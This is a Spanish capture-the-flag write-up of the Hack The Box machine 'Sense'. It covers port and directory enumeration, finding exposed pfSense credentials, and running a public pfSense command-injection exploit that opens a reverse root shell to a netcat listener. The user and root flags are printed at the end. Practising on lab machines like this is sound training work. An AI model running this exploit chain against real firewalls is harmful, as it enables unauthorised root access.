[HTB] Sense

Hoy vamos a hackear la maquina de HTB llamada Sense.

Video


Enumeration


Para empezar hacemos un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ sudo nmap -sV -sS -p- 10.10.10.60
[sudo] password for sml: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 17:45 CEST
Nmap scan report for 10.10.10.60
Host is up (0.049s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
443/tcp open  ssl/https?

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 267.68 seconds
Buscamos si hay algo interesante en la web...

sml@Cassandra:~$ gobuster dir -u https://10.10.10.60 -w 
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            https://10.10.10.60
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt
[+] Timeout:        10s
===============================================================
2020/05/12 15:57:35 Starting gobuster
===============================================================
/themes (Status: 301)
/css (Status: 301)
/includes (Status: 301)
/javascript (Status: 301)
/changelog.txt (Status: 200)
/classes (Status: 301)
/widgets (Status: 301)
/tree (Status: 301)
/shortcuts (Status: 301)
/installer (Status: 301)
/wizards (Status: 301)
/csrf (Status: 301)
/system-users.txt (Status: 200)
Visitamos https://10.10.10.60/system-users.txt y podemos ver los credenciales para acceder a Pfsense... Miramos la version y buscamos algun exploit que podamos utilizar.

sml@Cassandra:~$ searchsploit pfsense
----------------------------------- ----------------------------------------
 Exploit Title                     |  Path
                                   | (/usr/share/exploitdb/)
----------------------------------- ----------------------------------------
pfSense - 'interfaces.php?if' Cros | exploits/hardware/remote/35071.txt
pfSense - 'pkg.php?xml' Cross-Site | exploits/hardware/remote/35069.txt
pfSense - 'pkg_edit.php?id' Cross- | exploits/hardware/remote/35068.txt
pfSense - 'status_graph.php?if' Cr | exploits/hardware/remote/35070.txt
pfSense - (Authenticated) Group Me | exploits/unix/remote/43193.rb
pfSense 2 Beta 4 - 'graph.php' Mul | exploits/php/remote/34985.txt
pfSense 2.0.1 - Cross-Site Scripti | exploits/php/webapps/23901.txt
pfSense 2.1 build 20130911-1816 -  | exploits/php/webapps/31263.txt
pfSense 2.2 - Multiple Vulnerabili | exploits/php/webapps/36506.txt
pfSense 2.2.5 - Directory Traversa | exploits/php/webapps/39038.txt
pfSense 2.3.1_1 - Command Executio | exploits/php/webapps/43128.txt
pfSense 2.3.2 - Cross-Site Scripti | exploits/php/webapps/41501.txt
pfSense 2.4.1 - Cross-Site Request | exploits/php/remote/43341.rb
pfSense 2.4.4-P3 - 'User Manager'  | exploits/freebsd/webapps/48300.txt
pfSense 2.4.4-p1 (HAProxy Package  | exploits/php/webapps/46538.txt
pfSense 2.4.4-p1 - Cross-Site Scri | exploits/multiple/webapps/46316.txt
pfSense 2.4.4-p3 (ACME Package 0.5 | exploits/php/webapps/46936.txt
pfSense < 2.1.4 - 'status_rrd_grap | exploits/php/webapps/43560.py
pfSense Community Edition 2.2.6 -  | exploits/php/webapps/39709.txt
pfSense Firewall 2.2.5 - Config Fi | exploits/php/webapps/39306.html
pfSense Firewall 2.2.6 - Services  | exploits/php/webapps/39695.txt
pfSense UTM Platform 2.0.1 - Cross | exploits/freebsd/webapps/24439.txt
----------------------------------- ----------------------------------------
Shellcodes: No Result

Exploitation


Elegimos pfSense < 2.1.4 - 'status_rrd_grap exploits/php/webapps/43560.py Ponemos un nc a la escucha...

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
Y lanzamos el exploit.

sml@Cassandra:~$ python3 /usr/share/exploitdb/exploits/php/webapps/43560.py 
--rhost 10.10.10.60 --lhost 10.10.14.3 --lport 5555 --username rohit --password 
pfsense
CSRF token obtained
Running exploit...
Exploit completed
Obtenemos una root shell :)

sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.60] 55495
sh: can't access tty; job control turned off
#

user.txt



# cd /home
# ls
.snap
rohit
# cd rohit
# ls
.tcshrc
user.txt
# cat user.txt
8721327cc232073b40d27d9c17e7348b#   

root.txt



# cd /root
# ls
.cshrc
.first_time
.gitsync_merge.sample
.hushlogin
.login
.part_mount
.profile
.shrc
.tcshrc
root.txt
# cat root.txt
d08c32a5d4f8c8b10e76eb51a69f1a86
#

End


Y con esto ya tendriamos el flag del "user" y el flag de "root".